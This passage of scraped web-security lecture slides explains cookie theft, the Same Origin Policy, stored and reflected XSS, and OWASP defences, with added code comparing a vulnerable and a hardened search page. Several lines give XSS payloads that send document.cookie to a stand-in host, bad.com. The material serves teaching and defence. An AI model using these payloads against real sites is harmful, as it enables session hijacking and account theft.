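             ("no referrer, other session's token", suppressed_referrer_post(csrf_token("other"))))
    for name, req in cases:
        print(f"{name}: {authorize_state_change(req)}")
```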
![Page 193: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/193.jpg)
How can you steal a session cookie?
• Compromise the user’s machine / browser
• Sniff the network
• DNS cache poisoning
  • Trick the user into thinking you are Facebook
  • The user will send you the cookie
Network-based attacks (more later)
[Figure: the browser (Client) / web server (Server) cookie exchange from before; the session Cookie travels with every request, and each of these attacks gets at it somewhere along that path]
![Page 196: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/196.jpg)
Stealing users’ cookies
For now, we’ll assume this attack model:
• The user is visiting the site they expect
• All interactions are strictly through the browser
![Page 197: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/197.jpg)
Dynamic web pages
• Rather than static HTML, web pages can be expressed as a program, e.g., written in Javascript:
<html><body>
Hello, <b>
<script>var a = 1; var b = 2; document.write("world: ", a+b, "</b>");
</script>
</body></html>
![Page 198: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/198.jpg)
Javascript (no relation to Java)
• Powerful web page programming language
• Scripts are embedded in web pages returned by the web server
• Scripts are executed by the browser. They can:
  • Alter page contents (DOM objects)
  • Track events (mouse clicks, motion, keystrokes)
  • Issue web requests & read replies
  • Maintain persistent connections (AJAX)
  • Read and set cookies
![Page 199: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/199.jpg)
What could go wrong?
• Browsers need to confine Javascript’s power
• A script on attacker.com should not be able to:
  • Alter the layout of a bank.com web page
  • Read keystrokes typed by the user while on a bank.com web page
  • Read cookies belonging to bank.com
![Page 200: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/200.jpg)
Same Origin Policy
• Browsers provide isolation for javascript scripts via the Same Origin Policy (SOP)
• Browser associates web page elements…
  • Layout, cookies, events
• …with a given origin
  • The hostname (bank.com) that provided the elements in the first place
• SOP = only scripts received from a web page’s origin have access to the page’s elements
Cookies
[Diagram: the server’s Set-Cookie response is stored by the browser as (private) client data; the annotations give the semantics of each attribute]
• Store “en” under the key “edition”
• This value is no good as of Wed Feb 18…
• This value should only be readable by any domain ending in .zdnet.com
• This should be available to any resource within a subdirectory of /
• Send the cookie to any future requests to <domain>/<path>
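The attribute semantics above, as an added example that is not part of the slides: a Set-Cookie header is parsed into a record, and the browser-side decision of whether that record accompanies a later request to <domain>/<path> is made explicit. Function names are hypothetical, the sample header is constructed with a made-up expiry date, and matching follows RFC 6265 domain/path matching in simplified form.

```javascript
// Added example (not from the slides): a small model of cookie semantics.
// parseSetCookie() turns one Set-Cookie header into a record; shouldSend()
// is the browser's decision of whether that record is attached to a request.

// setHost is the host that sent the header; without a Domain attribute the
// cookie is host-only and goes back to exactly that host.
function parseSetCookie(header, setHost) {
  const parts = header.split(';').map((p) => p.trim()).filter(Boolean);
  const [name, ...rest] = parts[0].split('=');
  const cookie = { name: name.trim(), value: rest.join('=').trim(),
                   domain: setHost.toLowerCase(), hostOnly: true,
                   path: '/', expires: null };
  for (const attr of parts.slice(1)) {
    const eq = attr.indexOf('=');
    const key = (eq === -1 ? attr : attr.slice(0, eq)).trim().toLowerCase();
    const val = eq === -1 ? '' : attr.slice(eq + 1).trim();
    if (key === 'domain' && val) {           // a leading dot is ignored (RFC 6265)
      cookie.domain = val.replace(/^\./, '').toLowerCase();
      cookie.hostOnly = false;
    } else if (key === 'path' && val.startsWith('/')) {
      cookie.path = val;
    } else if (key === 'expires') {
      cookie.expires = new Date(val);        // "no good as of ..."
    }
  }
  return cookie;
}

// Domain match: exact host for host-only cookies, otherwise the host or any
// subdomain of the cookie's Domain ("any domain ending in .zdnet.com").
function domainMatches(cookie, host) {
  host = host.toLowerCase();
  if (cookie.hostOnly) return host === cookie.domain;
  return host === cookie.domain || host.endsWith('.' + cookie.domain);
}

// Path match: the request path equals the cookie path or lies beneath it
// ("any resource within a subdirectory of /"); '/accounts' is not under '/account'.
function pathMatches(reqPath, cookiePath) {
  if (reqPath === cookiePath) return true;
  if (!reqPath.startsWith(cookiePath)) return false;
  return cookiePath.endsWith('/') || reqPath[cookiePath.length] === '/';
}

// The browser's decision for a request to host/path made at time `now` (a Date).
function shouldSend(cookie, host, path, now) {
  if (cookie.expires && now >= cookie.expires) return false;
  return domainMatches(cookie, host) && pathMatches(path, cookie.path);
}

// Constructed sample: the slide's attribute values with a made-up expiry date.
const SAMPLE_HEADER =
  'edition=en; expires=Wed, 18 Feb 2026 00:00:00 GMT; path=/; domain=.zdnet.com';
```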
Cross-site scripting (XSS)
XSS: Subverting the SOP
• Attacker provides a malicious script
• Tricks the user’s browser into believing that the script’s origin is bank.com
• One general approach:
  • Trick the server of interest (bank.com) to actually send the attacker’s script to the user’s browser!
  • The browser will view the script as coming from the same origin… because it does!
Two types of XSS
1. Stored (or “persistent”) XSS attack
  • Attacker leaves their script on the bank.com server
  • The server later unwittingly sends it to your browser
  • Your browser, none the wiser, executes it within the same origin as the bank.com server
2. Reflected XSS attack
  • Attacker gets you to send the bank.com server a URL that includes some Javascript code
  • bank.com echoes the script back to you in its response
  • Your browser, none the wiser, executes the script in the response within the same origin as bank.com
Stored XSS attack
[Diagram: the client’s browser, bank.com and bad.com, with numbered steps]
1. bad.com injects the malicious script into bank.com
2. The client requests content from bank.com
3. The client receives the malicious script from bank.com
4. The browser executes the malicious script as though the server meant us to run it
5. The script then either performs an attacker action (GET http://bank.com/transfer?amt=9999&to=attacker) or steals valuable data (GET http://bad.com/steal?c=document.cookie)
Stored XSS Summary
• Target: User with a Javascript-enabled browser who visits a user-generated content page on a vulnerable web service
• Attack goal: run a script in the user’s browser with the same access as provided to the server’s regular scripts (i.e., subvert the Same Origin Policy)
• Attacker tools: ability to leave content on the web server (e.g., via an ordinary browser). Optional tool: a server for receiving stolen user information
• Key trick: Server fails to ensure that content uploaded to the page does not contain embedded scripts
Reflected XSS attack
Browser
Client
bank.com
bad.com
Click on link
3Echo user input
4
Execute the malicious scriptas though the server meant us to run it
5
Steal valuable data
6
Perform attacker action
6
Visit web site
1Receive malicious page
2
URL specially craftedby the attacker
Echoed input• The key to the reflected XSS attack is to find
instances where a good web server will echo the user input back in the HTML response
http://victim.com/search.php?term=socks
<html> <title> Search results </title><body>Results for socks :. . .</body></html>
Input from bad.com:
Result from victim.com:
Exploiting echoed inputhttp://victim.com/search.php?term= <script> window.open( “http://bad.com/steal?c=“ + document.cookie) </script>
<html> <title> Search results </title><body>Results for <script> ... </script> . . .</body></html>
Browser would execute this within victim.com’s origin
Input from bad.com:
Result from victim.com:
Reflected XSS Summary
• Target: User with a Javascript-enabled browser who visits a vulnerable web service that includes parts of the URLs it receives in the web page output it generates
• Attack goal: run a script in the user’s browser with the same access as provided to the server’s regular scripts (i.e., subvert the Same Origin Policy)
• Attacker tools: ability to get the user to click on a specially-crafted URL. Optional tool: a server for receiving stolen user information
• Key trick: Server fails to ensure that the output it generates does not contain embedded scripts other than its own
XSS Protection
• Open Web Application Security Project (OWASP):
  • Whitelist: Validate all headers, cookies, query strings… everything… against a rigorous spec of what should be allowed
  • Don’t blacklist: Do not attempt to filter/sanitize
  • Principle of fail-safe defaults
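The search.php behaviour from the “Exploiting echoed input” slides and the OWASP advice above, as one added example that is not part of the slides: the vulnerable render concatenates the query term into HTML as the slides describe, and the hardened render validates the term against a whitelist spec (rejecting, not filtering, anything else) and HTML-encodes it on output. The function names, the whitelist spec and the test payload handling are hypothetical; the payload itself is the one shown on the slides.

```javascript
// Added example (not the slides' code): vulnerable and hardened versions of
// a search results page, modelled in JavaScript rather than PHP.

// Vulnerable: the user-supplied term lands in the HTML body unchanged, so a
// <script> element in the term becomes part of victim.com's page.
function renderSearchUnsafe(term) {
  return `<html><title>Search results</title><body>Results for ${term}: ...</body></html>`;
}

// Whitelist spec for a search term (hypothetical policy): letters, digits,
// spaces and a little punctuation, at most 64 characters. Anything else is
// rejected outright; there is no attempt to "clean up" bad input (no blacklist).
const TERM_SPEC = /^[A-Za-z0-9 .,'\-]{1,64}$/;

function validateTerm(term) {
  if (typeof term !== 'string') return null;
  return TERM_SPEC.test(term) ? term : null;
}

// Output encoding for the HTML text context: the characters that can change
// HTML structure are replaced by entities, so data can never become markup.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened: fail-safe default (a 400 page that echoes nothing from the
// request) when validation fails, and encoding on output when it passes.
function renderSearchSafe(term) {
  const valid = validateTerm(term);
  if (valid === null) {
    return { status: 400, body: '<html><body>Invalid search term.</body></html>' };
  }
  return {
    status: 200,
    body: `<html><title>Search results</title><body>Results for ${escapeHtml(valid)}: ...</body></html>`,
  };
}

// Detection helper: does the rendered page contain a script element the
// server never put there? (The templates above contain none of their own.)
function containsInjectedScript(html) {
  return /<script\b/i.test(html);
}

// The slides' example input, embedded here as a constant for the stand-alone run.
const SLIDE_PAYLOAD =
  '<script> window.open("http://bad.com/steal?c=" + document.cookie) </script>';
```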
Mitigating cookie security threats
• Cookies must not be easy to guess
  • Randomly chosen
  • Sufficiently long
• Time out session IDs and delete them once the session ends
Twitter vulnerability
• Uses one cookie (auth_token) to validate the user
• The cookie is a function of
  • User name
  • Password
• auth_token weaknesses
  • Does not change from one login to the next
  • Does not become invalid when the user logs out
• Steal this cookie once, and you can log in as the user any time you want (until password change)
XSS vs. CSRF
• Do not confuse the two:
• XSS attacks exploit the trust a client browser has in data sent from the legitimate website
  • So the attacker tries to control what the website sends to the client browser
• CSRF attacks exploit the trust the legitimate website has in data sent from the client browser
  • So the attacker tries to control what the client browser sends to the website